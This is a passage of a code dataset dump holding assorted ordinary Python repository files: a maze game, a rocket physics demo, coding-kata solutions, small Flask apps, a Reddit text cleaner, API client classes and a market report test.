if puzzle == \"\":\r\n puzzle = choice(Maze.puzzles)\r\n if puzzle == \"kruskal\":\r\n self.walls = Kruskal(rows, cols, cellSize, self.board)\r\n else:\r\n self.walls = Prim(rows, cols, cellSize, self.board)\r\n\r\n def draw(self, canvas, exitImg):\r\n # main function which calls another drawing function\r\n canvas.create_rectangle(0, 0, self.width, self.height, \r\n fill=\"mint cream\")\r\n self.drawMaze(canvas, exitImg)\r\n\r\n def drawMaze(self, canvas, exitImg):\r\n # draws the maze and the player\r\n walls = self.walls\r\n for wall in walls:\r\n (x0, y0, x1, y1) = getValues(wall, self.cellSize)\r\n canvas.create_line(x0, y0, x1, y1, width=2, fill=\"black\")\r\n self.player.draw(canvas)\r\n lx = (self.cols - 1) * self.cellSize + self.cellSize/2\r\n ly = (self.rows - 1) * self.cellSize + self.cellSize/2\r\n canvas.create_image(lx, ly, image=exitImg)\r\n\r\n def checkBounds(self, x, y):\r\n # checks for collisions of player with walls or going off the board\r\n if (((x - self.player.radius < 0) or \r\n (x + self.player.radius > self.width)) or \r\n ((y - self.player.radius < 0) or \r\n (y + self.player.radius > self.height))):\r\n # off the board check\r\n return False\r\n for wall in self.walls:\r\n ((frow, fcol), (srow, scol)) = wall\r\n (x0, y0, x1, y1) = getValues(wall, self.cellSize)\r\n if frow == srow:\r\n # horizontal wall check\r\n diff = abs(y - y0)\r\n if (diff < self.player.radius and \r\n (x0 <= x-self.player.radius <= x1 or \r\n x0 <= x+self.player.radius <= x1)):\r\n return False\r\n if fcol == scol:\r\n # vertical wall check\r\n diff = abs(x - x0)\r\n if (diff < self.player.radius and \r\n (y0 <= y-self.player.radius <= y1 or \r\n y0 <= y+self.player.radius <= y1)):\r\n return False\r\n return True\r\n\r\n def onKeyPressed(self, direction):\r\n # controls the movement of Player \r\n # sends updated values to check if within bounds, and then makes move\r\n x, y = self.player.x, self.player.y\r\n if direction == \"Up\" and self.checkBounds(x, y-self.player.speed):\r\n self.player.moveUp()\r\n elif direction == \"Down\" and self.checkBounds(x, y+self.player.speed):\r\n self.player.moveDown()\r\n elif direction == \"Right\" and self.checkBounds(x+self.player.speed, y):\r\n self.player.moveRight()\r\n elif direction == \"Left\" and self.checkBounds(x-self.player.speed, y):\r\n self.player.moveLeft()\r\n if ((self.player.x+self.player.radius>=(self.cols-1)*self.cellSize+self.cellSize/2)\r\n and (self.player.y+self.player.radius>=(self.rows-1)*self.cellSize+self.cellSize/2)):\r\n # checks if game is won\r\n return True\r\n\r\ndef getValues(wall, cellSize):\r\n # finds the pixel coordinates of wall\r\n ((frow, fcol), (srow, scol)) = wall\r\n x0 = fcol * cellSize\r\n y0 = frow * cellSize\r\n x1 = scol * cellSize\r\n y1 = srow * cellSize\r\n return (x0, y0, x1, y1)","repo_name":"sbhotika/15112-term-project","sub_path":"Maze.py","file_name":"Maze.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37295802809","text":"import math\n\nimport pymunk\nfrom pymunk.pyglet_util import DrawOptions\nfrom pymunk.vec2d import Vec2d\n\nimport pyglet\n\nwindow = pyglet.window.Window(900, 600, \"Rocketry\", resizable=False)\noptions = DrawOptions()\n\nspace = pymunk.Space()\nspace.gravity = 0, 0\n\ndef centroid(vertices, weights=None):\n num = len(vertices)\n if weights is None:\n weights = [1 / num] * num\n \n xsum = 0\n ysum = 0\n for i, v in enumerate(vertices):\n xsum += v[0] * weights[i]\n ysum += v[1] * weights[i]\n \n return (xsum, ysum)\n\n\nclass Part:\n STACKED = 0\n RADIAL = 1\n\n def __init__(self):\n self.vertices = [(0, 0)]\n\n self.mount = Part.STACKED\n\n self.mass = 0\n self.radial_size = 0 # only applies to circular parts\n self.height = 0\n\n self.impact_tolerance = 0 # mps\n self.heat_tolerance = 0\n\n def move_to(self, x, y):\n self.vertices = [(v[0] + x, v[1] + y) for v in self.vertices]\n\n\nclass Engine(Part):\n def __init__(self):\n super().__init__()\n\n self.radial_size = 90\n self.height = 180\n\n self.mass = 150\n self.burn = 8.8\n self.burning = False\n self.atm_thrust = 162.91\n self.vac_thrust = 192.0\n\n def engage(self):\n self.burning = True\n\n def get_impulse(self, dt):\n if self.burning:\n self.burn -= dt\n bottom_left = self.vertices[0]\n impulse_x = bottom_left[0] + self.radial_size // 2\n impulse_y = bottom_left[1] - self.height // 2\n return (impulse_x, impulse_y, self.atm_thrust)\n else:\n return (0, 0, 0)\n\n\nclass Rocket:\n def __init__(self):\n self.parts = []\n\n def add_part(self, part):\n self.parts.append(part)\n\n def get_body_and_shape(self):\n # compile part data\n vertices = []\n mass = 0\n centroids_map = {}\n for p in self.parts:\n vertices += p.vertices\n mass += p.mass\n centroids_map[centroid(p.vertices)] = p.mass\n\n # calculate center of mass\n weighted_centroids_map = {c: m / mass for c, m in centroids_map.items()}\n centroids = list(weighted_centroids_map.keys())\n weights = [weighted_centroids_map[c] for c in centroids]\n com = centroid(centroids, weights)\n\n # calculate offset\n vertices = list(set(vertices))\n center = centroid(vertices)\n offset = Vec2d(center) - Vec2d(com)\n\n # create body\n body = pymunk.Body(mass)\n shape = pymunk.Poly(body, vertices)\n body.moment = pymunk.moment_for_poly(mass, vertices)\n body.center_of_gravity = com\n body.position = 450, 300\n\n return body, shape, body.local_to_world(com)\n\npod = Part()\npod.vertices = [(0, 0), (45, 90), (90, 0)]\npod.mass = 10\n\nengine = Engine()\nengine.vertices = [(0, 0), (0, -engine.height), (engine.radial_size, -engine.height), (engine.radial_size, 0)]\nengine.engage()\n\nrocket = Rocket()\nrocket.parts = [pod, engine]\n\nbody, shape, com = rocket.get_body_and_shape()\nspace.add(body, shape)\n\nlabel = pyglet.text.Label(\"Center Of Mass\",\n font_size=8,\n x=com[0], y=com[1],\n anchor_x=\"center\", anchor_y=\"center\")\nx, y = body.local_to_world((45, 90))\nlabel2 = pyglet.text.Label(\"(45, 90)\",\n font_size=8,\n x=x, y=y,\n anchor_x=\"center\", anchor_y=\"center\")\n \n\n@window.event\ndef on_draw():\n window.clear()\n space.debug_draw(options)\n label.draw()\n label2.draw()\n\ndef update(dt):\n global label2\n\n impulse_x, impulse_y, impulse_amount = engine.get_impulse(dt)\n x, y = body.local_to_world((impulse_x, impulse_y))\n label2 = pyglet.text.Label(\"Impulse\",\n font_size=8,\n x=x, y=y,\n anchor_x=\"center\", anchor_y=\"center\")\n\n impulse_x, impulse_y, impulse_amount = engine.get_impulse(dt)\n body.apply_impulse_at_local_point((0, impulse_amount), (impulse_x, impulse_y))\n space.step(dt)\n\nif __name__ == \"__main__\":\n pyglet.clock.schedule_interval(update, 1.0 / 60.0)\n pyglet.app.run()\n","repo_name":"henrymwestfall/Pyglet-Pymunk-Test","sub_path":"rocket.py","file_name":"rocket.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23070082037","text":"def bin_rota(arr):\n resp = []\n for i,v in enumerate(arr):\n if i%2==0: resp+=v\n else: resp+=list(reversed(v))\n return resp\n\n\ndef bin_rota_up(arr):\n return [name for i, row in enumerate(arr) for name in row[::-1 if i%2 else 1]]\n\n\n\nprint(bin_rota([[\"Stefan\", \"Raj\", \"Marie\"],\n [\"Alexa\", \"Amy\", \"Edward\"],\n [\"Liz\", \"Claire\", \"Juan\"],\n [\"Dee\", \"Luke\", \"Katie\"]]))\nprint(bin_rota_up([[\"Stefan\", \"Raj\", \"Marie\"],\n [\"Alexa\", \"Amy\", \"Edward\"],\n [\"Liz\", \"Claire\", \"Juan\"],\n [\"Dee\", \"Luke\", \"Katie\"]]))\n\n\n","repo_name":"igruiz91/Codewars-HackerRank-LeetCode-CoderBite-freeCodeCamp","sub_path":"Codewars/Python/7 kyu/II/The Lazy Startup Office.py","file_name":"The Lazy Startup Office.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2438640237","text":"\"\"\"\n作业1\n在Hero的基础上,新增了法师英雄,多了下面内容\n\n法师(Mage)\n 增加属性:魔法值(magical 默认0,最大100)\n\n - 攻击:\n 调用一次 怒气 `+2`\n 调用一次 魔法值 `+5`\n\n - 放大招\n 魔法值满时自动放大招\n\n - 第二形态\n 当怒气值满时 自动切换第二形态(魔法值最大值修改为50)\n\"\"\"\n\n\nclass Hero:\n def __init__(self, name, weapon, equipment, power, blood, anger):\n self.name = name\n self.weapon = weapon\n self.equipment = equipment\n self.power = power\n self.blood = blood\n self.anger = anger\n\n def attack(self):\n print(f'{self.name} 发动了攻击!')\n self.anger += 2\n\n if self.anger == 100: # 怒气值满\n self.big_data()\n\n def big_data(self):\n print(f'{self.name} 释放了大招!')\n self.anger = 0\n\n\nclass Mage(Hero):\n def __init__(self, name, weapon, equipment, power, blood, anger):\n super().__init__(name, weapon, equipment, power, blood, anger)\n self.magical = 0\n\n def second_form(self):\n print(f'{self.name} 变身第二形态')\n if self.magical >= 50:\n self.big_data()\n self.anger = 0\n print(f'{self.name}恢复原形')\n\n def big_data(self):\n print(f'{self.name} 释放了大招!')\n self.magical = 0\n\n def attack(self): # !!!!主函数\n print(f'{self.name} 发动了攻击!')\n self.magical += 5\n self.anger += 2\n\n if self.magical == 100:\n self.big_data()\n\n elif self.anger == 100:\n self.second_form()\n\n\nmage1 = Mage('牛逼魔法师', '魔法棒', '扫帚', 0, 100, 78)\nfor i in range(100):\n mage1.attack()\n print(mage1.magical)\n print(mage1.anger)\n\n'''\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 思路 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n变身第二形态是为了干什么 --> 让最大法力变成50:法力50就可以放大 --> 在second_form()当中判断当变身的时候法力如果\n大于50就放大. 当然, 没有50就放不了大,之后怒气恢复0.因为题目中是怒气满100自动第二形态,所以能不能放大也要看运气, 可能\n第二形态的时候魔力没有满50.\n'''\n","repo_name":"lll13508510371/hexin","sub_path":"核心/10 类与继承/03 课后作业/0015-10-00000001-对象继承.py","file_name":"0015-10-00000001-对象继承.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3436000870","text":"import heapq\nclass Solution:\n def constrainedSubsetSum(self, nums: List[int], k: int) -> int:\n l = len(nums)\n first_pos = l\n last_pos = -1\n for i,v in enumerate(nums):\n if v > 0:\n first_pos = min(first_pos, i)\n last_pos = max(last_pos, i)\n if last_pos == -1:\n return max(nums)\n\n\n l = len(nums)\n q = [(-nums[first_pos], first_pos)]\n for i in range(first_pos+1, last_pos+1):\n while q and q[0][1] + k < i:\n heapq.heappop(q)\n\n waspos = nums[i] >= 0\n\n nums[i] += max(0, -q[0][0])\n \n if waspos:\n q = []\n \n heapq.heappush(q, (-nums[i], i))\n #print(nums)\n return max(nums)\n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_1425/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69972747432","text":"import pymongo\nfrom flask import Flask, render_template, url_for, request, flash, redirect, jsonify, send_file, session\nfrom flask_cors import CORS, cross_origin\nfrom bson.json_util import dumps\nimport json\napp = Flask(__name__)\nfrom update_route import *\nmongo = pymongo.MongoClient(host=\"localhost\",port=27017)\ndb=mongo.algoinvstr\n\n@app.route('/')\ndef index():\n niftyv = db.nifty.find()\n companylist = db.toptwenty.find()\n return render_template('index.html',nifty=niftyv[0][\"cur_val\"],nifty_high=niftyv[0][\"all_time_high\"],change_per=niftyv[0][\"down_per\"],mylist=companylist,time=niftyv[0][\"time\"],date=niftyv[0][\"date\"])\n\n@app.route('/update')\ndef call():\n updatecalled()\n niftyv = db.nifty.find()\n companylist = db.toptwenty.find()\n return render_template('index.html',nifty=niftyv[0][\"cur_val\"],nifty_high=niftyv[0][\"all_time_high\"],change_per=niftyv[0][\"down_per\"],mylist=companylist,time=niftyv[0][\"time\"],date=niftyv[0][\"date\"])\n\n\nif __name__ == \"__main__\":\n print('started')\n app.run(debug=True)","repo_name":"Shrirampareek888/Algorithmic-Investor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35399565223","text":"import pandas as pd\nimport re\nfrom nltk.corpus import stopwords\nimport redditcleaner\n\n\ndef cleancsv(input_filepath, output_filepath):\n df = pd.read_csv(input_filepath, encoding='utf-8')\n\n #filtering out entries that have no text\n df = df[df['selftext'].notnull()]\n\n #filtering out entries that have no title\n df = df[df['title'].notnull()]\n\n #converting to time stamp and dropping unnecessary columns\n df['time_created'] = pd.to_datetime(df['created_utc'], unit='s')\n df = df.drop(columns = ['url', 'created_utc', 'created'])\n\n #removing rows that are deleted, removed, and blank comments\n df = df.loc[df['selftext'] != '[deleted]']\n df = df.loc[df['selftext'] != '[removed]']\n df = df.loc[df['selftext'] != '']\n\n #removing rows that are deleted, removed, and blank titles\n df = df.loc[df['title'] != '[deleted]']\n df = df.loc[df['title'] != '[removed]']\n df = df.loc[df['title'] != '']\n\n #processing text\n df['processed_text'] = df['selftext'].map(redditcleaner.clean)\n\n #removing blank comments\n df = df.loc[df['processed_text'] != '']\n\n #removing puncutation\n df['processed_text'] = df['processed_text'].map(lambda x: re.sub('[,;\\!?]', '', x))\n\n #removing any missed urls\n df['processed_text'] = df['processed_text'].map(lambda x: re.sub(r'(?:(?:http|https):\\/\\/)?([-a-zA-Z0-9.]{2,256}\\.[a-z]{2,4})\\b(?:\\/[-a-zA-Z0-9@:%_\\+.~#?&//=]*)?',\"\",x,flags=re.MULTILINE))\n \n #removing puncutation\n df['processed_text'] = df['processed_text'].map(lambda x: re.sub('[,;\\.!?]', '', x))\n\n #removing parentheses\n df['processed_text'] = df['processed_text'].map(lambda x: re.sub('[()]' ,'', x))\n\n #fixing apostrophes\n #df['processed_text'] = df['processed_text'].replace({\"’\" : \"'\"}, regex=True)\n\n #lowercasing all the words\n df['processed_text'] = df['processed_text'].map(lambda x: x.lower())\n\n #removing stopwords\n stop = stopwords.words('english')\n df['processed_text'] = df['processed_text'].apply(lambda x: ' '.join([item for item in str.split(x) if item not in stop]))\n\n #removing abbreviations\n df['processed_text'] = df['processed_text'].map(lambda x: re.sub('y/o' ,'year old', x))\n\n #removing posts that have any NAs or blank commends\n df = df.loc[df['processed_text'] != '']\n df = df.dropna()\n\n #---------------------------------------------------\n #---------------------------------------------------\n #now doing the same process for titles \n\n #processing text\n df['processed_title'] = df['title'].map(redditcleaner.clean)\n\n #removing blank comments\n df = df.loc[df['processed_title'] != '']\n\n #removing puncutation\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub('[,;\\!?]', '', x))\n\n #removing any missed urls\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub(r'(?:(?:http|https):\\/\\/)?([-a-zA-Z0-9.]{2,256}\\.[a-z]{2,4})\\b(?:\\/[-a-zA-Z0-9@:%_\\+.~#?&//=]*)?',\"\",x,flags=re.MULTILINE))\n \n #removing puncutation\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub('[,;\\.!?]', '', x))\n\n #lowercasing all the words\n df['processed_title'] = df['processed_title'].map(lambda x: x.lower())\n\n #removing parentheses and brackets\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub('[()]' ,'', x))\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub('[\\[\\]]' ,'', x))\n\n #removing abbreviations\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub('y/o' ,'year old', x))\n\n #removing posts that have any NAs or blank commends\n df = df.loc[df['processed_title'] != '']\n df = df.dropna()\n\n #removing stopwords\n stop = stopwords.words('english')\n df['processed_title_no_stop'] = df['processed_title'].apply(lambda x: ' '.join([item for item in str.split(x) if item not in stop]))\n\n #printing out the first 5 rows \n print(df.head())\n\n #printing to csv\n df.to_csv(output_filepath, index=False, encoding='utf-8-sig')\n\n\n\"\"\" \nRuns data processing scripts to turn raw data from (../raw) into\ncleaned data ready to be analyzed (saved in ../processed).\n\"\"\"\ndef main(input_filepath, output_filepath):\n \n cleancsv(input_filepath, output_file)\n\nif __name__ == '__main__':\n input_file = '../../data/raw/raw_reddit_scrape_3.csv'\n output_file = '../../data/processed/cleaned_reddit_data_3.csv'\n\n main(input_file, output_file)\n","repo_name":"vmmadathil/forums_aca_needs","sub_path":"src/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73285344233","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PySide6.QtWidgets import QDialog, QLabel\n\nfrom .license_dialog_ui import Ui_LicenseDialog\n\n\nsoftwares = [\n ('PySide6', '6.5.1', 'https://pypi.org/project/PySide6/', 'Commercial, GPLv2, LGPLv3', 'https://pypi.org/project/PySide6/'),\n # ('Paraview', '', 'https://www.paraview.org/', 'permissive BSD', 'https://www.paraview.org/license/'),\n ('ionicons', '', 'https://ionic.io/ionicons', 'Completely open source, MIT licensed', 'https://ionic.io/ionicons'),\n ('PyFoam', '2022.9', 'https://pypi.org/project/PyFoam', 'GPLv2+', 'https://pypi.org/project/PyFoam/'),\n ('h5py', '3.9.0', 'https://docs.h5py.org/en/stable/', 'h5py', 'https://docs.h5py.org/en/stable/licenses.html'),\n ('qasync', '0.24.0', 'https://pypi.org/project/qasync/', 'BSD', 'https://pypi.org/project/qasync/'),\n ('psutil', '5.9.5', 'https://pypi.org/project/psutil/', 'BSD', 'https://pypi.org/project/psutil/'),\n]\n\nclass LicenseDialog(QDialog):\n def __init__(self, widget):\n super().__init__(widget)\n self._ui = Ui_LicenseDialog()\n self._ui.setupUi(self)\n\n layout = self._ui.licenses.layout()\n row = 1\n for software, version, url, licence, licneceUrl in softwares:\n softwareLink = QLabel(f'{software}')\n softwareLink.setOpenExternalLinks(True)\n layout.addWidget(softwareLink, row, 0)\n licenceLink = QLabel(f'{licence}')\n licenceLink.setOpenExternalLinks(True)\n layout.addWidget(licenceLink, row, 1)\n row += 1\n\n self._connectSignalsSlots()\n\n def _connectSignalsSlots(self):\n self._ui.close.clicked.connect(self.close)\n","repo_name":"nextfoam/baram","sub_path":"baramMesh/view/menu/help/license_dialog.py","file_name":"license_dialog.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"70633343914","text":"from typing import Dict, List\n\nfrom canvas_workflow_kit import events\nfrom canvas_workflow_kit.canvas_code_set import CanvasCodeSet\nfrom canvas_workflow_kit.intervention import Intervention\nfrom canvas_workflow_kit.patient_recordset import InterviewRecordSet\nfrom canvas_workflow_kit.protocol import STATUS_DUE, STATUS_SATISFIED, ClinicalQualityMeasure, ProtocolResult\nfrom canvas_workflow_kit.recommendation import (\n Recommendation, ImmunizationRecommendation\n)\nfrom canvas_workflow_kit.timeframe import Timeframe\nfrom canvas_workflow_kit.value_set.specials import (\n Covid19QuestionnaireHighRiskOutreach,\n Covid19QuestionnaireSymptomaticSurveillance\n)\n\n\nfrom canvas_workflow_kit.value_set.v2018 import (\n InfluenzaVaccine_1254\n)\n\n# flake8: noqa\n\n\nclass HyperlinkRecommendation(ClinicalQualityMeasure):\n\n class Meta:\n title = 'Hyperlink Recommendation'\n version = \"1.2\"\n changelog = \"Initial release\"\n\n description = 'All patients with COVID Questionnaire completed Date < 7 days ago and > 5 days ago.'\n information = 'https://canvas-medical.zendesk.com/hc/en-us/articles/360059084173-COVID-19-Risk-Assessment-Follow-Up-Protocol'\n\n identifiers = ['CCP001v1']\n\n types = ['CCP']\n\n responds_to_event_types = [\n events.HEALTH_MAINTENANCE,\n ]\n authors = [\n 'Canvas Medical Team',\n ]\n\n compute_on_change_types = [\n ClinicalQualityMeasure.CHANGE_INTERVIEW,\n ]\n\n def compute_results(self) -> ProtocolResult:\n result = ProtocolResult()\n\n result.add_recommendation(\n Intervention(\n title='Link Rec Title',\n narrative=f'Link Rec Narr',\n href='http://canvasmedical.com'\n )\n )\n result.add_recommendation(\n ImmunizationRecommendation(\n key='KEY-ID',\n rank=123,\n button='ACT',\n patient=self.patient,\n immunization=InfluenzaVaccine_1254)\n )\n\n return result\n","repo_name":"dhes/canvas-workflow-kit-0.6.8","sub_path":"canvas_workflow_kit/builtin_cqms/hyperlink_recommendation.py","file_name":"hyperlink_recommendation.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36261941750","text":"import gzip\nimport base64\nfrom lxml import etree\nfrom cardmarket_api.call import api_request\nfrom cardmarket_api.utils import dict_to_xml\n\n\nclass CardMarketSession:\n \"\"\"Create a session for specified account\"\"\"\n\n # 5000 requests per 24 hours max\n request_count = 0\n expires = None\n\n def __init__(self, mkm_app_token, mkm_app_secret, mkm_access_token, mkm_token_secret):\n self.credentials = {\"mkm_app_token\": mkm_app_token,\n \"mkm_app_secret\": mkm_app_secret,\n \"mkm_access_token\": mkm_access_token,\n \"mkm_token_secret\": mkm_token_secret}\n\n @api_request\n def get_metaproduct_info(self, metaproduct_id):\n \"\"\"Return info for metaproduct specified by id\"\"\"\n endpoint = \"/metaproduct/{0}\".format(metaproduct_id)\n data_type = \"metaproduct\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n @api_request\n def get_product_info(self, product_id):\n \"\"\"Return info for product specified by id\"\"\"\n endpoint = \"/products/{0}\".format(product_id)\n data_type = \"product\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n @api_request\n def get_products_by_name(self, card_name, exact=False, id_language=1):\n \"\"\"Return a list of product from card_name either in English or French.\n card_name has to be an exact match\n English idLanguage = 1\n French idLanguage = 2\"\"\"\n endpoint = \"/products/find\"\n parameters = {\"search\": card_name, \"exact\": exact, \"idGame\": 1, \"idLanguage\": id_language}\n return {\"endpoint\": endpoint, \"data_type\": \"product\", \"parameters\": parameters}\n\n @api_request\n def get_articles_for_sale(self, product_id):\n \"\"\"Return list of all articles for sale for a specified article\"\"\"\n endpoint = \"/articles/{0}\".format(product_id)\n data_type = \"article\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n def get_all_products(self):\n \"\"\"Return binary list of all cardMarket products. Use 'wb' to write down\"\"\"\n gzip_file = self.get_all_products_file()\n data = gzip.decompress(base64.b64decode(gzip_file))\n return data\n\n @api_request\n def get_all_products_file(self):\n \"\"\"Return gzip file with all cardMarket products\"\"\"\n endpoint = \"/productlist\"\n data_type = \"productsfile\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n @api_request\n def get_all_expansions(self):\n \"\"\"Return list of all expansions\"\"\"\n endpoint = \"/games/1/expansions\"\n return {\"endpoint\": endpoint}\n\n @api_request\n def get_wantlists(self):\n \"\"\"Return list of all wantLists of the account\"\"\"\n endpoint = \"/wantslist\"\n data_type = \"wantslist\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n @api_request\n def get_cards_from_wantlist(self, id):\n \"\"\"Return list of cards from specified wantList by id\"\"\"\n endpoint = \"/wantslist/{0}\".format(id)\n data_type = \"want\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n @api_request\n def get_shopping_cart(self):\n \"\"\"Return dict with shippingAddress, shoppingCart and account\"\"\"\n endpoint = \"/shoppingcart\"\n return {\"endpoint\": endpoint}\n\n @staticmethod\n def construct_xml(dict_list):\n \"\"\"Return MKM API valid binary string XML from a list of dict\n For empty SubElement set value to None type\"\"\"\n xml_tree = etree.Element(\"request\")\n [dict_to_xml(xml_tree, d) for d in dict_list]\n return etree.tostring(xml_tree, encoding='UTF-8', xml_declaration=True)\n\n\nif __name__ == \"__main__\":\n # Tests:\n\n print(cm.get_products_by_name(\"giant spider\"))\n print(cm.request_count)\n","repo_name":"NicolasCapon/cardmarket_api","sub_path":"cardmarket_api/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2767885388","text":"'''\ninputs: month, day, Daily_Temp, Daily_Precip, Daily_Humidity, Daily_Pressure, Daily_WindDir,\n Daily_WindSpeed, Daily_DNI, Daily_DHI\n\noutput: Daily_radiation\n'''\n\n# import modules\nfrom flask import Flask, jsonify, request\nimport pandas as pd\nimport joblib\nfrom app.preprocessing_functions import log_transform\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef get_input():\n '''\n Flask script to interface between user request and ml model selected during POC \n '''\n # load packets\n packet = request.get_json(force=True)\n print(packet)\n\n # extract and reshape input data\n #input_data = list(packet.values())\n\n #print(input_data)\n\n # reshape data\n data = pd.DataFrame(packet, index=[0])\n\n print(data)\n\n # load the ml model\n model_path = 'app/rf_model.joblib'\n model = joblib.load(model_path)\n\n # generate prediction\n solar_irr = model.predict(data)[0]\n\n return jsonify(packet, {'Solar irradiation':solar_irr})","repo_name":"max-lutz/ML-tools-and-algorithms","sub_path":"MLOps/MLOps_course_Omdena/Solar_project/solar_app/app/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"184196879","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner # noqa\n\nfrom core.testcase import TestCase, main\nfrom core.types import HyperCategory, Offer, Shop\nfrom core.matcher import Absent\n\n\nclass T(TestCase):\n @classmethod\n def prepare_pricedrops(cls):\n cls.index.shops += [\n Shop(fesh=20267000),\n Shop(fesh=20267001),\n Shop(fesh=20267002),\n Shop(fesh=20267003),\n Shop(fesh=20267004),\n ]\n\n cls.index.hypertree += [\n HyperCategory(hid=20267000),\n ]\n\n cls.index.offers += [\n Offer(title=\"offer1\", fesh=20267000, enable_auto_discounts=1, price=100000, price_history=None),\n Offer(\n title=\"offer2\",\n fesh=20267001,\n enable_auto_discounts=1,\n price=100000,\n price_old=150000,\n price_history=None,\n ),\n Offer(title=\"offer3\", fesh=20267002, enable_auto_discounts=1, price=100000, price_history=120000),\n Offer(\n title=\"offer4\",\n fesh=20267003,\n enable_auto_discounts=1,\n price=100000,\n price_old=150000,\n price_history=120000,\n ),\n Offer(title=\"offer5\", fesh=20267004, enable_auto_discounts=1, price=150000, price_history=120000),\n ]\n\n def test_autosale_no_disount_if_nothing_old(self):\n response = self.report.request_json('place=prime&fesh=20267000')\n self.assertFragmentIn(\n response,\n {\n \"titles\": {\"raw\": \"offer1\"},\n \"prices\": {\"value\": \"100000\", \"discount\": Absent()},\n },\n )\n\n def test_autosale_disount_if_only_history(self):\n response = self.report.request_json('place=prime&fesh=20267002')\n self.assertFragmentIn(\n response, {\"titles\": {\"raw\": \"offer3\"}, \"prices\": {\"value\": \"100000\", \"discount\": {\"percent\": 17}}}\n )\n\n def test_autosale_disount_if_oldprice_and_hprice(self):\n response = self.report.request_json('place=prime&fesh=20267003')\n self.assertFragmentIn(\n response, {\"titles\": {\"raw\": \"offer4\"}, \"prices\": {\"value\": \"100000\", \"discount\": {\"percent\": 17}}}\n )\n\n def test_drop_bad_autosale(self):\n response = self.report.request_json('place=prime&fesh=20267004')\n self.assertFragmentIn(\n response, {\"titles\": {\"raw\": \"offer5\"}, \"prices\": {\"value\": \"150000\", \"discount\": Absent()}}\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_enable_auto_discounts.py","file_name":"test_enable_auto_discounts.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17302262227","text":"from itertools import groupby\nfrom enum import Enum\nimport copy\nfrom flaskr import typing\n\n\nclass AggregationType(str, Enum):\n pricing = 'p'\n name = 'n'\n\n\n# https://stackoverflow.com/questions/5884066/hashing-a-dictionary\ndef make_hash(o):\n \"\"\"\n makes a hash out of anything that contains only list,dict and hashable types including string and numeric types\n \"\"\"\n def _freeze(o):\n if isinstance(o, dict):\n return frozenset({ k:_freeze(v) for k,v in o.items()}.items())\n if isinstance(o, (list)):\n return tuple([_freeze(v) for v in o])\n\n return str(o)\n return hash(_freeze(o))\n\n\ndef _key(aggregationType: AggregationType):\n if aggregationType == AggregationType.pricing:\n return lambda a: make_hash([a['pricing'] if 'pricing' in a else None, a['currency']])\n if aggregationType == AggregationType.name:\n return lambda a: make_hash([a['name'], a['currency']])\n\n\ndef _filter(aggregationType: AggregationType):\n if aggregationType == AggregationType.pricing:\n return None\n if aggregationType == AggregationType.name:\n return lambda a: 'pricing' not in a\n\n\ndef _asList(o, key=None):\n if isinstance(o, dict):\n if key in o:\n return _asList(o[key])\n return []\n if isinstance(o, list):\n return o\n return [o]\n\n\ndef _merge(lhs, rhs):\n assert 'pricing' not in lhs or 'pricing' not in rhs or lhs['pricing'] == rhs['pricing']\n assert lhs['currency'] == rhs['currency']\n\n result = copy.deepcopy(lhs)\n\n result['_id'] = list(set(_asList(lhs, '_id') + _asList(rhs, '_id')))\n result['institution'] = list(set(_asList(lhs, 'institution') + _asList(rhs, 'institution')))\n\n result['operations'] = sorted(_asList(lhs, 'operations') + _asList(rhs, 'operations'), key=lambda op: op['date'])\n finalQuantity = 0\n for operation in result['operations']:\n if 'quantity' in operation:\n 